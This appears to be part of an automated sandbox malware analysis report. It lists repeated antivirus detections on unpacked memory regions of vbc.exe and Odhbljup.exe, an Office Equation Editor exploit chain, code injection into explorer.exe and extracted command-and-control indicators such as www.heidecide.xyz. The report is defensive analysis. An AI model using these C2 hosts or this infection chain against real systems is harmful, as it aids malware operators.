Source: 4.3.vbc.exe.31459c.33.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31943c.203.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01dfc.274.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60eec.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b88.80.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.167.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d8058c.216.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd0a8.92.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e2c.142.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c3b0.212.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9258.185.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71b2c.122.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c8e0.221.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50cc.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0154c.245.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80008.214.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce943c.203.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cd5c.233.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32b840.150.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332764.18.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b88.82.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced448.260.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64d5c.88.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3210a4.44.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65eec.146.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331f44.281.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cf84.239.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a74.199.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0154c.246.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec3b0.213.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314b88.80.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dfc.274.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310c38.38.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80ed4.234.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf9768.59.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec3b0.211.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce43b0.68.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80008.213.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1b2c.121.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9f80.26.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b84.85.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.145.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4f28.98.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb84.227.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d594.279.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3143b0.70.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330ed4.233.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cd5c.231.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf5be4.10.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ca4.266.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.161.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d1ac.248.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf8fb8.156.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68fdc.173.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.197.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321d44.129.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ca4.265.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3014.137.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d643b0.69.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb88.224.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.161.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01b78.257.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfdb70.110.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd60c.102.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3148e0.78.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4d5c.88.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330008.214.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330008.212.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6943c.204.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331324.242.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d5a0.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf96b4.182.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d620.283.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0e80.52.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9258.187.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79f90.13.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310b08.36.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64f28.97.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f4.267.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb88.223.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c3b0.211.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6911c.56.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e2c.140.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314b84.84.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.162.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce43b0.70.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01b18.60.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe368.16.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5eec.146.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70ed4.92.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329938.189.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf92e0.43.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50cc.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65eec.144.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d598.277.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315494.128.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310b08.34.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.161.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650cc.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81ef4.276.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5eec.144.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0199c.254.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315eec.146.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0058c.216.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c008.207.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01dfc.272.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31fffc.32.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dac.269.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a74.201.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.323ffc.86.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5e30.138.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d652c8.113.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d444.264.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01c54.262.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31cb84.227.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7126c.98.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0eec.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb84.229.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.79.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf8fb8.159.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d69308.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7058c.75.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318fdc.175.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cef438.65.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318fdc.173.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650cc.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cff438.208.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d734.287.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7d60c.99.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7909c.162.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9308.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf058c.75.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a1c.193.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.328008.154.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331520.48.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0c38.38.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d00ad4.225.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31f438.67.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331774.248.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50f4.104.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced444.263.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d648e4.74.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79938.189.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71414.55.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.323000.141.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81520.45.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced5a0.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3292e0.43.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318b08.35.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d098.245.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7d0a8.94.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.39.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79a74.198.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321894.8.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.147.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32b840.149.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332094.284.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.320008.71.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d098.243.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331dfc.274.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.328fb8.157.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e610.131.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31932c.192.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65e30.138.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d448.261.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d444.265.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64b84.85.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650f4.105.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321604.108.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d098.245.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d5a0.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce459c.33.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70ed4.89.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d5a0.8.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb88.225.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0e80.54.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318d98.155.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80ed4.232.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329c94.204.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e368.17.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c8e4.217.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d793d4.176.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced378.256.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d8199c.254.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d00008.214.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.192.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.325be4.13.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d620.285.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe2fc.123.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.42.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e0.219.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315388.120.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.39.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60b08.35.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.320ad4.83.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7b840.150.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4f28.96.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f0.273.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332094.286.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1894.11.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7db70.110.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329f90.15.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced098.244.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c008.208.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf5be4.12.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32909c.163.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecd5c.231.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf909c.163.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d73014.137.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5e30.136.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01520.46.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33154c.244.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c8e4.217.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced620.285.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6914c.179.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.40.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6fb84.28.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9f80.28.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3185dc.153.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce48e4.72.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.319308.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe610.131.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d82764.16.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf19ac.114.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.191.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce459c.30.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1894.8.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64b84.84.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0199c.253.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb84.227.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0058c.218.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81c54.262.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8b08.37.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf0008.71.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.169.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.167.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32058c.75.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6911c.54.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d1ac.247.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7f438.210.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4370.24.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4d5c.89.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e2fc.126.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71604.106.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.167.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfb840.150.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d444.263.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced620.283.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33199c.253.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3ffc.87.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd0a8.93.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce52c8.112.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4370.25.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf0ed4.91.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1414.56.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d790f4.170.unpack	Avira: Label: TR/Patched.Ren.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	4_2_004057AC
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	7_2_004057AC
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	10_2_004057AC

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: onedrive.live.com

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\NAPSTAT.EXE

Code function: 4x nop then pop ebx

12_2_00086AB7

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 87.98.234.164 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.urzeczenie.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.heidecide.xyz/hno0/

HTTP GET or POST without a user agent

Source: global traffic

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
